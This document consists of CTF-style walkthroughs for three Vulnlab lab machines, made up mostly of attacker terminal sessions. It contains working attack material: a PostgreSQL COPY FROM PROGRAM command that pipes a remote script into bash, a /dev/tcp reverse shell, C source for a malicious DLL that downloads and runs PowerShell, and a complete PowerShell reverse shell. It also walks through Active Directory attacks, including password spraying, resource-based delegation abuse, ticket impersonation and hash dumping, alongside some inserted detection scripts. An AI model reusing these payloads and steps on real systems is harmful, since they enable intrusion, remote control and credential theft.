@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/ ############# ,@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############( @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  ###########  @@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  #######*  @@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 
(service@10.10.99.219) Password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-1014-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jul 27 07:50:05 UTC 2024

  System load:  0.21142578125     Processes:             122
  Usage of /:   32.1% of 7.57GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for ens5: 10.10.99.219
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Oct 24 13:11:33 2023 from 10.10.1.254
Connection to 10.10.99.219 closed.

.

We have to use a trick: the shell is closed right after login, but SSH still honours port forwards, so we forward the PostgreSQL unix socket to a local one with -N -L:

┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ ssh -N -L /tmp/.s.PGSQL.5433:/var/run/postgresql/.s.PGSQL.5432 service@10.10.99.219         
..snip.. (the same ssh banner as above)
(service@10.10.99.219) Password: 

.

┌──(puck㉿kali)-[~/vulnlab/slonik]
└─$ psql -h /tmp -U postgres -p 5433
psql (15.3 (Debian 15.3-0+deb12u1), server 14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
Type "help" for help.

postgres=# \list
                                             List of databases
   Name    |  Owner   | Encoding | Collate |  Ctype  | ICU Locale | Locale Provider |   Access privileges   
-----------+----------+----------+---------+---------+------------+-----------------+-----------------------
 postgres  | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | 
 service   | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | 
 template0 | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | =c/postgres          +
           |          |          |         |         |            |                 | postgres=CTc/postgres
 template1 | postgres | UTF8     | C.UTF-8 | C.UTF-8 |            | libc            | =c/postgres          +
           |          |          |         |         |            |                 | postgres=CTc/postgres
(4 rows)

postgres=# DROP TABLE IF EXISTS cmd_exec;
NOTICE:  table "cmd_exec" does not exist, skipping
DROP TABLE
postgres=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
postgres=# COPY cmd_exec FROM PROGRAM 'curl http://10.8.2.138/s | bash';

The file s contains:

#!/bin/bash
bash -i >& /dev/tcp/10.8.2.138/443 0>&1
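COPY ... FROM PROGRAM runs the command as the postgres OS user and needs superuser or membership in pg_execute_server_program; here the socket connection arrived as postgres with no password at all. With log_statement = 'all' (or pgaudit) such statements are visible in the server log, and the following added example, not part of this writeup, scans log lines for the server-side file and program primitives. The log lines are constructed in Ubuntu's default prefix format (log_line_prefix = '%m [%p] %q%u@%d '), which is an assumption about the target's configuration.

```python
"""
Flag PostgreSQL statements that reach the server's filesystem or spawn a
program: COPY ... FROM/TO PROGRAM, COPY to/from a server path, and the
pg_read_file / pg_ls_dir / lo_import family. Constructed log sample.
"""
import re

SAMPLE_LOG = """\
2024-07-27 08:20:11.421 UTC [2311] postgres@postgres LOG:  statement: CREATE TABLE cmd_exec(cmd_output text);
2024-07-27 08:20:15.002 UTC [2311] postgres@postgres LOG:  statement: COPY cmd_exec FROM PROGRAM 'curl http://10.8.2.138/s | bash';
2024-07-27 08:21:03.118 UTC [2340] service@service LOG:  statement: select * from users;
2024-07-27 08:21:30.900 UTC [2340] service@service LOG:  statement: COPY users FROM STDIN;
2024-07-27 08:22:40.551 UTC [2355] app@service LOG:  statement: SELECT pg_read_file('/etc/passwd');
2024-07-27 08:23:05.007 UTC [2360] app@service ERROR:  permission denied for function pg_read_file
"""

# "<timestamp> <tz> [<pid>] <user>@<db> LOG:  statement: <sql>"
LINE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<who>\S+) LOG:\s+statement: (?P<stmt>.*)$"
)

RULES = [
    ("copy-program", re.compile(r"\bCOPY\b.*\b(FROM|TO)\s+PROGRAM\b", re.I)),
    ("copy-server-file", re.compile(r"\bCOPY\b.*\b(FROM|TO)\s+'", re.I)),  # a quoted server path, not STDIN/STDOUT
    ("server-file-function", re.compile(
        r"\b(pg_read_file|pg_read_binary_file|pg_ls_dir|lo_import|lo_export|pg_file_write)\s*\(", re.I)),
]


def classify(statement):
    """Return the name of the first rule the statement matches, else None."""
    for name, pattern in RULES:
        if pattern.search(statement):
            return name
    return None


def scan(lines):
    """Return a finding dict for every logged statement that matches a rule."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # continuation lines and non-statement messages
        rule = classify(m.group("stmt"))
        if rule:
            findings.append({
                "ts": m.group("ts"),
                "pid": int(m.group("pid")),
                "who": m.group("who"),
                "rule": rule,
                "statement": m.group("stmt"),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['who']} [{f['rule']}] {f['statement']}")
```

Two caveats: multi-line statements are logged with continuation lines that carry no prefix, so join them before scanning, and log_statement = 'all' is noisy on a busy server, which is why pgaudit is the usual choice. On the prevention side, the roles to review are pg_roles with rolsuper set and the members of pg_execute_server_program, pg_read_server_files and pg_write_server_files, and the local socket should not allow trust or peer authentication for postgres from an account like service.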

Privesc

postgres@slonik:/opt/backups/current$  python3 -c 'import pty;pty.spawn("/bin/bash")'
<nt$  python3 -c 'import pty;pty.spawn("/bin/bash")'
postgres@slonik:/opt/backups/current$ export TERM=xterm
export TERM=xterm
postgres@slonik:/opt/backups/current$ 
zsh: suspended  rlwrap nc -nlvp 443
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/slonik2]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 443
postgres@slonik:/opt/backups/current$

.

postgres@slonik:/var/lib/postgresql/14/main$ chmod 777 pwn
chmod 777 pwn
postgres@slonik:/var/lib/postgresql/14/main$ chmod u+s pwn
chmod u+s pwn
postgres@slonik:/var/lib/postgresql/14/main$ ls -lah /opt/backups/current/
ls -lah /opt/backups/current/
total 3.0M
drwxr-xr-x 19 root root 4.0K Jul 27 08:26 .
drwxr-xr-x  3 root root 4.0K Oct 23  2023 ..
-rw-------  1 root root    3 Jul 27 08:26 PG_VERSION
..snip..
-rw-------  1 root root   88 Jul 27 08:26 postgresql.auto.conf
-rwxrwxrwx  1 root root 1.4M Jul 27 08:26 pwn

postgres@slonik:/var/lib/postgresql/14/main$ /opt/backups/current/pwn -p
/opt/backups/current/pwn -p
pwn-5.1# id    id
id
uid=115(postgres) gid=123(postgres) euid=0(root) groups=123(postgres),122(ssl-cert)
pwn-5.1# cd /rocd /root
cd /root
pwn-5.1# cat rocat root.txt
cat root.txt
VL{b0<redacted>fa}
pwn-5.1# 

 

vulnlab-phantom

vulnlab-phantom

a medium windows machine

┌──(puck㉿kali)-[~/vulnlab/phantom]
└─$ crackmapexec smb dc.phantom.vl -u 'guest' -p '' --shares     
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB         dc.phantom.vl   445    DC               [+] phantom.vl\guest: 
SMB         dc.phantom.vl   445    DC               [+] Enumerated shares
SMB         dc.phantom.vl   445    DC               Share           Permissions     Remark
SMB         dc.phantom.vl   445    DC               -----           -----------     ------
SMB         dc.phantom.vl   445    DC               ADMIN$                          Remote Admin
SMB         dc.phantom.vl   445    DC               C$                              Default share
SMB         dc.phantom.vl   445    DC               Departments Share                 
SMB         dc.phantom.vl   445    DC               IPC$            READ            Remote IPC
SMB         dc.phantom.vl   445    DC               NETLOGON                        Logon server share 
SMB         dc.phantom.vl   445    DC               Public          READ            
SMB         dc.phantom.vl   445    DC               SYSVOL                          Logon server share

.

crackmapexec smb dc.phantom.vl -u 'guest' -p '' --rid-brute 5000
cat userlist.txt| cut -d '\' -f2 | awk '{print $1}' | tee users.txt

.

smbclient -U 'guest\phantom.vl' //dc.phantom.vl/Public                                       

Password for [GUEST\phantom.vl]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 11 17:03:14 2024
  ..                                DHS        0  Sun Jul  7 10:39:30 2024
  tech_support_email.eml              A    14565  Sat Jul  6 18:08:43 2024

        6127103 blocks of size 4096. 1181062 blocks available
smb: \> get tech_support_email.eml 
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (171.4 KiloBytes/sec) (average 171.4 KiloBytes/sec)
smb: \>

Viewing the EML gives:

Welcome to Phantom!
Dear <NAME>
We are excited to have you on board.
Below are your user credentials:
Username: <USERNAME>
Password: Ph<redacted>t!
Please log in to your account using these credentials. For security reasons, we strongly
recommend that you change your password immediately after your first login.
If you have any questions or need assistance, feel free to reach out to our support team at
techsupport@phantom.vl
Best regards,
The Phant

.

crackmapexec smb dc.phantom.vl -u users.txt -p 'Ph<redacted>t!' --continue-on-success --no-bruteforce

hashcat (mode 13721) to find the password of the VeraCrypt container:

hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
crackmapexec smb dc.phantom.vl -u 'ibryant' -p 'Ph<redacted>t!' -M spider_plus 

Found in the backup file under /opt/vyatta/config/tmp/new_config_5175/vpn/sstp/authentication/local-users/username/: user lstanley with password gB<redacted>Rc

.

crackmapexec smb dc.phantom.vl -u users.txt -p gB<redacted>Rc --continue-on-success

.

crackmapexec winrm dc.phantom.vl -u svc_sspr -p gB<redacted>Rc
evil-winrm --ip phantom.vl -u 'svc_sspr' -p 'gB<redacted>Rc'
bloodhound-python -d phantom.vl -v --zip -c all -u 'svc_sspr' -p 'gB<redacted>Rc' -ns 10.10.115.252 --dns-tcp   

Here comes the fun

net rpc password "crose" "Summer2024" -U "phantom.vl"/"svc_sspr"%"gB<redacted>Rc" -S "phantom.vl"

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024           
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024

.

crackmapexec ldap dc.phantom.vl -u crose -p Summer2024 -M maq
SMB         dc.phantom.vl   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024 
MAQ         dc.phantom.vl   389    DC               [*] Getting the MachineAccountQuota
MAQ         dc.phantom.vl   389    DC               MachineAccountQuota: 0

Let’s delegate

impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip '10.10.123.229' -action 'write' 'phantom.vl'/'crose':'Summer2024'        
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=crose.ccache

over-pass-the-hash

impacket-getTGT -hashes :$(pypykatz crypto nt 'Summer2024') 'phantom.vl'/'crose'      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in crose.ccache

export KRB5CCNAME=crose.ccache
python3 describeTicket.py crose.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 250eee68243a68044b984d8c79a35883
impacket-smbpasswd -newhashes :250eee68243a68044b984d8c79a35883 phantom.vl/crose:'Summer2024'@dc.phantom.vl 
 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

[*] NTLM hashes were changed successfully.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.123.229 -action 'write' 'phantom.vl'/'crose' -hashes :250eee68243a68044b984d8c79a35883
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)
[*] crose can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)
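Two of the steps above leave distinctive audit events: svc_sspr resetting crose's password with net rpc (Event 4724, a reset performed by a different principal than the target) and crose writing msDS-AllowedToActOnBehalfOfOtherIdentity on DC$ (Event 5136, Directory Service Changes). The following is an added example, not part of this writeup, that flags both in a constructed batch of events as a SIEM would present them after parsing; the helpdesk allow-list and the event field names are assumptions.

```python
"""
Flag the two directory changes made above: a password reset of another
account by a non-helpdesk principal (4724) and any write to the RBCD
attribute, rated high when the object sits in the Domain Controllers OU
(5136). Events are constructed.
"""
import json
from collections import namedtuple

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
DC_CONTAINER = "OU=Domain Controllers,"
RESET_ALLOWED = {"svc_helpdesk"}  # accounts expected to reset other users' passwords (assumption)
OPERATION = {"%%14674": "value added", "%%14675": "value deleted"}  # 5136 OperationType codes

SAMPLE_EVENTS = json.dumps([
    {"EventID": 4724, "SubjectUserName": "svc_sspr", "TargetUserName": "crose",
     "TargetDomainName": "PHANTOM"},
    {"EventID": 4724, "SubjectUserName": "svc_helpdesk", "TargetUserName": "jdoe",
     "TargetDomainName": "PHANTOM"},
    {"EventID": 5136, "SubjectUserName": "crose",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=phantom,DC=vl", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "crose",
     "ObjectDN": "CN=crose,CN=Users,DC=phantom,DC=vl", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
])

Finding = namedtuple("Finding", "event_id severity subject target reason")


def analyze(events):
    """Return a Finding for every event that matches one of the two rules."""
    findings = []
    for e in events:
        eid = e.get("EventID")
        if eid == 4724 and e["SubjectUserName"] not in RESET_ALLOWED:
            findings.append(Finding(
                4724, "medium", e["SubjectUserName"], e["TargetUserName"],
                "password reset of another account by a non-helpdesk principal"))
        elif eid == 5136 and e.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            on_dc = DC_CONTAINER in e["ObjectDN"]
            op = OPERATION.get(e.get("OperationType"), e.get("OperationType"))
            reason = f"RBCD attribute {op} on a {e.get('ObjectClass')} object"
            if on_dc:
                reason += " that is a domain controller"
            findings.append(Finding(
                5136, "high" if on_dc else "medium", e["SubjectUserName"], e["ObjectDN"], reason))
    return findings


def analyze_json(text):
    """Convenience wrapper for a JSON array of events."""
    return analyze(json.loads(text))


if __name__ == "__main__":
    for f in analyze_json(SAMPLE_EVENTS):
        print(f"{f.event_id} [{f.severity}] {f.subject} -> {f.target}: {f.reason}")
```

Event 5136 is only written when the "Audit Directory Service Changes" subcategory is enabled and the object has a SACL covering Write Property, so the rule is worth pairing with a periodic LDAP query for any object whose msDS-AllowedToActOnBehalfOfOtherIdentity is set. The underlying weakness is the write permission crose held on DC$, which BloodHound shows as an edge to the domain controller.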

export KRB5CCNAME=crose.ccache

.

impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

.

impacket-secretsdump -k dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b<redacted>5d:::

.

evil-winrm --ip phantom.vl -u 'Administrator' -H '71<redacted>30'

That was fun.

vulnlab-push

vulnlab-push

a hard windows machine

preparation

create puck.c on the kali box

puck.c contains:

#include <windows.h>
#include <stdlib.h>   /* system() */

/* DLL entry point: when the DLL is loaded into a process it starts PowerShell,
   which fetches puckshell.txt from the attacker's HTTP listener and runs it. */
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason) {
        case DLL_PROCESS_ATTACH:
            /* download cradle: pull the script from the http.server started below and IEX it */
            system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");
            break;
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

create malicious dll

puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

puckshell.txt contains:

# Close the socket and the cmd.exe process, then leave
function cleanup {
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit
}
# Setup IPADDR (address of the nc listener)
$address = '192.168.1.136'
# Setup PORT
$port = '443'
# Connect back to the listener
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
# Start cmd.exe with its stdin/stdout redirected so we can pump them over the socket
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
# Send the banner/prompt cmd.exe printed on startup
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
    if ($client.Connected -ne $true) {cleanup}
    # Read one line (up to LF) from the socket
    $pos = 0; $i = 1
    while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
        $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
        $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
    if ($pos -gt 0) {
        # Feed the line to cmd.exe, then relay its output back (dropping the echoed command)
        $string = $encoding.GetString($networkbuffer,0,$pos)
        $inputstream.write($string)
        start-sleep 1
        if ($process.ExitCode -ne $null) {cleanup}
        else {
            $out = $encoding.GetString($outputstream.Read())
            while($outputstream.Peek() -ne -1){
                $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
            $stream.Write($encoding.GetBytes($out),0,$out.length)
            $out = $null
            $string = $null}} else {cleanup}}

on the attacker pc, run the http listener and the nc listener

c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) ...
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.

C:\Windows\System32>whoami
fakedomain\hillie

test on windows target with

rundll32.exe C:\Payloads\puck.dll,XYZ

If all tests are successful, we continue to the writeup.

Writeup:

To abuse ClickOnce we follow the article: we need to upload our SelfService.dll.deploy, which will download and execute a reverse shell.

More to come …

With a shell as kelly.hill we find her credentials in her home folder

evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!' 
xfreerdp  /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx

Bloodhound Analysis:

bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp

Check Machine Quota

crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq

 

RBCD abuse

From BloodHound we see that kelly.hill has First Degree Object Control over MS01: AllExtendedRights and WriteAccountRestrictions. AllExtendedRights means we can read all properties on MS01, and WriteAccountRestrictions means we can edit msDS-AllowedToActOnBehalfOfOtherIdentity on MS01 to perform RBCD (resource-based constrained delegation).

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-addcomputer -method LDAPS -computer-name 'puckie' -computer-pass 'Summer2024!' -dc-host dc01.push.vl -domain-netbios push.vl 'push.vl/kelly.hill:Sh<redacted>i!'     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Successfully added machine account puckie$ with password Summer2024!.
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-rbcd -delegate-from 'puckie$' -delegate-to 'MS01$' -action 'write' 'push.vl/kelly.hill:Sh<redacted>i!' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*] Delegation rights modified successfully!
[*] puckie$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     puckie$      (S-1-5-21-1451457175-172047642-1427519037-3603)
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-getST -spn 'cifs/ms01.push.vl' -impersonate 'administrator' 'push.vl/puckie$:Summer2024!'  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache            

                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump -k ms01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31)
PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)
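The "Accounts allowed to act on behalf of other identity" list printed by impacket-rbcd above comes from the binary security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity. As an added example (not the page's or impacket's code), the parser below decodes that descriptor and lists the SIDs whose ACEs allow delegation, so a defender can pull the attribute from LDAP and audit which accounts may impersonate users to a host; build_sd only constructs a sample value inline, and the SID is the puckie$ SID from the output above.

```python
import struct

# Shape of the DACL impacket-rbcd writes: one ACCESS_ALLOWED_ACE per account with a
# full-control mask; the SD control word is SE_DACL_PRESENT | SE_SELF_RELATIVE.
ACCESS_ALLOWED_ACE = 0x00
FULL_CONTROL = 0x000F01FF
SD_CONTROL = 0x8004
SD_HEADER = "<BBHIIII"  # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl

def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' as a binary SID: revision, count, 48-bit authority, sub-authorities."""
    parts = sid.split("-")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs))
            + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def bytes_to_sid(buf: bytes, off: int) -> str:
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))

def build_sd(sids, mask=FULL_CONTROL) -> bytes:
    """Constructed sample: a self-relative SD whose DACL allows each SID (the layout rbcd writes)."""
    aces = b"".join(struct.pack("<BBHI", ACCESS_ALLOWED_ACE, 0, 8 + len(s), mask) + s
                    for s in map(sid_to_bytes, sids))
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    return struct.pack(SD_HEADER, 1, 0, SD_CONTROL, 0, 0, 0, struct.calcsize(SD_HEADER)) + dacl

def allowed_to_delegate(sd: bytes):
    """Return [(sid, mask)] for every ACCESS_ALLOWED ACE in the DACL; [] when no DACL is present."""
    rev, _, control, _, _, _, dacl_off = struct.unpack_from(SD_HEADER, sd, 0)
    if rev != 1 or not (control & 0x0004) or dacl_off == 0:
        return []  # no DACL: nobody is allowed to act on behalf of other identities
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    out, off = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE:
            out.append((bytes_to_sid(sd, off + 8), mask))
        off += ace_size  # step to the next ACE whatever its type
    return out

if __name__ == "__main__":
    # puckie$ SID taken from the rbcd output above; the descriptor itself is constructed here
    sample = build_sd(["S-1-5-21-1451457175-172047642-1427519037-3603"])
    for sid, mask in allowed_to_delegate(sample):
        print("allowed to delegate to this host: %s (mask 0x%08X)" % (sid, mask))
```

Any SID in that list that is not a known, approved service account is a finding; an attribute that is absent or has no DACL means no RBCD is configured on the host.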

Now that we have the Administrator hash of ms01, we pass the hash with evil-winrm:

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ evil-winrm --ip ms01.push.vl -u 'Administrator' -H 'd8<redacted>61'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\kelly.hill\documents> dir


    Directory: C:\Users\kelly.hill\documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/25/2024   7:39 AM        1125376 SharpSCCM.exe


*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2090991
*Evil-WinRM* PS C:\Users\kelly.hill\documents> 


.

┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py find -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:15:22] INFO     [*] Checking for System Management Container.                                                    
[10:15:22] INFO     [+] Found System Management Container. Parsing DACL.                                             
[10:15:22] INFO     [-] System Management Container not found.                                                       
[10:15:22] INFO     [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'                          
[10:15:23] INFO     [-] No results found.                                                                            
                                                                                                                     
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py smb -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:17:30] INFO     [-] No SiteServers found in database.                                                            
[10:17:30] INFO     [-] No Management Points found in database.                                                      
[10:17:30] INFO     [-] No computers found in database.

I could not solve the sccadmin exploit.

It should run like below, giving the hash in Responder:

